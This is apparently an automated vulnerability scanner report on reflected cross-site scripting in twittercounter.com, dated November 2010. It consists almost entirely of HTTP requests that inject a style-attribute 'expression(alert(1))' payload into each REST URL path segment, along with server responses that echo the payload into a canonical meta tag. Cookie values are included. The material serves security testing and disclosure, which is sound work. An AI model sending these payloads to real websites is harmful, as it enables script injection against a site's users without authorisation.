The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5040"style%3d"x%3aexpression(alert(1))"b22ac5f977 was submitted in the REST URL parameter 2. This input was echoed as c5040"style="x:expression(alert(1))"b22ac5f977 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76c5040"style%3d"x%3aexpression(alert(1))"b22ac5f977/month/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:25 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23884
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76c5040"style="x:expression(alert(1))"b22ac5f977/month/followers" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62d23"style%3d"x%3aexpression(alert(1))"19d13f1f252 was submitted in the REST URL parameter 3. This input was echoed as 62d23"style="x:expression(alert(1))"19d13f1f252 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/month62d23"style%3d"x%3aexpression(alert(1))"19d13f1f252/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:39 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22946
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/month62d23"style="x:expression(alert(1))"19d13f1f252/followers" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fefe"style%3d"x%3aexpression(alert(1))"8958a8111d7 was submitted in the REST URL parameter 4. This input was echoed as 9fefe"style="x:expression(alert(1))"8958a8111d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/month/followers9fefe"style%3d"x%3aexpression(alert(1))"8958a8111d7 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:56 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/month/followers9fefe"style="x:expression(alert(1))"8958a8111d7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3edbd"style%3d"x%3aexpression(alert(1))"e6881201366 was submitted in the REST URL parameter 1. This input was echoed as 3edbd"style="x:expression(alert(1))"e6881201366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare3edbd"style%3d"x%3aexpression(alert(1))"e6881201366/fukumitsu76/week/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:15 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare3edbd"style="x:expression(alert(1))"e6881201366/fukumitsu76/week/followers" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24fe5"style%3d"x%3aexpression(alert(1))"765116b1fc2 was submitted in the REST URL parameter 2. This input was echoed as 24fe5"style="x:expression(alert(1))"765116b1fc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu7624fe5"style%3d"x%3aexpression(alert(1))"765116b1fc2/week/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:36 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu7624fe5"style="x:expression(alert(1))"765116b1fc2/week/followers" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c57"style%3d"x%3aexpression(alert(1))"bcb2dc9e4f9 was submitted in the REST URL parameter 3. This input was echoed as 47c57"style="x:expression(alert(1))"bcb2dc9e4f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/week47c57"style%3d"x%3aexpression(alert(1))"bcb2dc9e4f9/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:55 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23009
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/week47c57"style="x:expression(alert(1))"bcb2dc9e4f9/followers" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b19f"style%3d"x%3aexpression(alert(1))"4fb27818175 was submitted in the REST URL parameter 4. This input was echoed as 4b19f"style="x:expression(alert(1))"4fb27818175 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/week/followers4b19f"style%3d"x%3aexpression(alert(1))"4fb27818175 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:12 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22953
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/week/followers4b19f"style="x:expression(alert(1))"4fb27818175" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14411"style%3d"x%3aexpression(alert(1))"20757d66638 was submitted in the REST URL parameter 1. This input was echoed as 14411"style="x:expression(alert(1))"20757d66638 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare14411"style%3d"x%3aexpression(alert(1))"20757d66638/fukumitsu76/week/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:37 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare14411"style="x:expression(alert(1))"20757d66638/fukumitsu76/week/friends" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 206a8"style%3d"x%3aexpression(alert(1))"41edb33e4c4 was submitted in the REST URL parameter 2. This input was echoed as 206a8"style="x:expression(alert(1))"41edb33e4c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76206a8"style%3d"x%3aexpression(alert(1))"41edb33e4c4/week/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:02 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23670
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76206a8"style="x:expression(alert(1))"41edb33e4c4/week/friends" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3406e"style%3d"x%3aexpression(alert(1))"88b7c316e95 was submitted in the REST URL parameter 3. This input was echoed as 3406e"style="x:expression(alert(1))"88b7c316e95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/week3406e"style%3d"x%3aexpression(alert(1))"88b7c316e95/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:10 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22992
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/week3406e"style="x:expression(alert(1))"88b7c316e95/friends" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de12c"style%3d"x%3aexpression(alert(1))"f51a3a9824e was submitted in the REST URL parameter 4. This input was echoed as de12c"style="x:expression(alert(1))"f51a3a9824e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/week/friendsde12c"style%3d"x%3aexpression(alert(1))"f51a3a9824e HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:22 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/week/friendsde12c"style="x:expression(alert(1))"f51a3a9824e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f90"style%3d"x%3aexpression(alert(1))"ed969033a0b was submitted in the REST URL parameter 1. This input was echoed as 41f90"style="x:expression(alert(1))"ed969033a0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare41f90"style%3d"x%3aexpression(alert(1))"ed969033a0b/fukumitsu76/week/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:15 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare41f90"style="x:expression(alert(1))"ed969033a0b/fukumitsu76/week/updates" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d94"style%3d"x%3aexpression(alert(1))"75cfdaba383 was submitted in the REST URL parameter 2. This input was echoed as 72d94"style="x:expression(alert(1))"75cfdaba383 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu7672d94"style%3d"x%3aexpression(alert(1))"75cfdaba383/week/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:31 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu7672d94"style="x:expression(alert(1))"75cfdaba383/week/updates" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891ab"style%3d"x%3aexpression(alert(1))"c416ff559e1 was submitted in the REST URL parameter 3. This input was echoed as 891ab"style="x:expression(alert(1))"c416ff559e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/week891ab"style%3d"x%3aexpression(alert(1))"c416ff559e1/updates HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:39 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/week891ab"style="x:expression(alert(1))"c416ff559e1/updates" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 260fd"style%3d"x%3aexpression(alert(1))"c51cb566097 was submitted in the REST URL parameter 4. This input was echoed as 260fd"style="x:expression(alert(1))"c51cb566097 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/fukumitsu76/week/updates260fd"style%3d"x%3aexpression(alert(1))"c51cb566097 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:49 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22932
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/fukumitsu76/week/updates260fd"style="x:expression(alert(1))"c51cb566097" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acd8b"style%3d"x%3aexpression(alert(1))"d331666d29c was submitted in the REST URL parameter 1. This input was echoed as acd8b"style="x:expression(alert(1))"d331666d29c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /fukumitsu76acd8b"style%3d"x%3aexpression(alert(1))"d331666d29c HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:01 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/fukumitsu76acd8b"style="x:expression(alert(1))"d331666d29c" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3000"style%3d"x%3aexpression(alert(1))"50a6e1c09be was submitted in the REST URL parameter 1. This input was echoed as e3000"style="x:expression(alert(1))"50a6e1c09be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /jmmagazinee3000"style%3d"x%3aexpression(alert(1))"50a6e1c09be HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:14 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/jmmagazinee3000"style="x:expression(alert(1))"50a6e1c09be" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0e74"style%3d"x%3aexpression(alert(1))"9504525bc79 was submitted in the REST URL parameter 1. This input was echoed as b0e74"style="x:expression(alert(1))"9504525bc79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /justinbieberb0e74"style%3d"x%3aexpression(alert(1))"9504525bc79 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:19 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23674
